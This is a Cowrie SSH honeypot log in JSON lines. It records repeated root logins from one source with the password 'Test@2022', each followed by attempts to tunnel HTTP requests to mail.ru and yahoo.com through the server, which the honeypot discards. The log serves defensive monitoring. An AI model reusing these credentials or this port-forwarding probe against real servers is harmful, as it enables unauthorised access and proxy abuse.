{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":3987,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:3987","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.567410Z","session":"812ba478bf3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.617857Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":17374,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:17374","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.760701Z","session":"812ba478bf3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.811252Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":4373,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4373","sensor":"my-vps","timestamp":"2025-08-31T03:50:03.952707Z","session":"812ba478bf3c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.003434Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.054696Z","src_ip":"77.83.207.83","session":"812ba478bf3c"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13328,"dst_ip":"1.2.3.4","dst_port":22,"session":"d681758821a2","protocol":"ssh","message":"New connection: 77.83.207.83:13328 (1.2.3.4:22) [session: d681758821a2]","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.103956Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.105019Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.155310Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.session.closed","duration":"46.8","message":"Connection lost after 46.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.216623Z","src_ip":"212.227.125.160","session":"87702f8d34a0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.406428Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":1949,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:1949","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.458404Z","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.508820Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.20","dst_port":80,"src_ip":"77.83.207.83","src_port":10036,"message":"direct-tcp connection request to 74.6.231.20:80 from 127.0.0.1:10036","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.652658Z","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.20","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.20:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.703059Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"77.83.207.83","src_port":23395,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:23395","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.844606Z","session":"d681758821a2"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.894925Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.946032Z","src_ip":"77.83.207.83","session":"d681758821a2"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13419,"dst_ip":"1.2.3.4","dst_port":22,"session":"47974218367e","protocol":"ssh","message":"New connection: 77.83.207.83:13419 (1.2.3.4:22) [session: 47974218367e]","sensor":"my-vps","timestamp":"2025-08-31T03:50:04.995139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.005644Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.046061Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.297902Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26735,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26735","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.350055Z","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.400755Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":13520,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:13520","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.544874Z","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.595360Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":31618,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:31618","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.740939Z","session":"47974218367e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.791371Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.843041Z","src_ip":"77.83.207.83","session":"47974218367e"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13525,"dst_ip":"1.2.3.4","dst_port":22,"session":"e325d8802278","protocol":"ssh","message":"New connection: 77.83.207.83:13525 (1.2.3.4:22) [session: e325d8802278]","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.891380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.892250Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:05.942090Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40078,"dst_ip":"1.2.3.4","dst_port":22,"session":"d42661988690","protocol":"ssh","message":"New connection: 212.227.125.160:40078 (1.2.3.4:22) [session: d42661988690]","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.158103Z"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.189460Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":5538,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:5538","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.240509Z","session":"e325d8802278"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.290051Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"77.83.207.83","src_port":15930,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:15930","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.431880Z","session":"e325d8802278"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.481574Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":2345,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:2345","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.623853Z","session":"e325d8802278"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.632395Z","src_ip":"212.227.125.160","session":"d42661988690"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.633239Z","src_ip":"212.227.125.160","session":"d42661988690"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.673436Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.723555Z","src_ip":"77.83.207.83","session":"e325d8802278"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":13635,"dst_ip":"1.2.3.4","dst_port":22,"session":"35ac988de458","protocol":"ssh","message":"New connection: 77.83.207.83:13635 (1.2.3.4:22) [session: 35ac988de458]","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.772360Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.773301Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:50:06.823185Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.071565Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20103,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20103","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.122311Z","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.173083Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.163","dst_port":80,"src_ip":"77.83.207.83","src_port":5627,"message":"direct-tcp connection request to 98.137.11.163:80 from 127.0.0.1:5627","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.316139Z","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.163","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.163:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.365978Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":10707,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:10707","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.508238Z","session":"35ac988de458"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.558219Z","src_ip":"77.83.207.83","session":"35ac988de458"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:50:07.608948Z","src_ip":"77.83.207.83","session":"35ac988de458"}
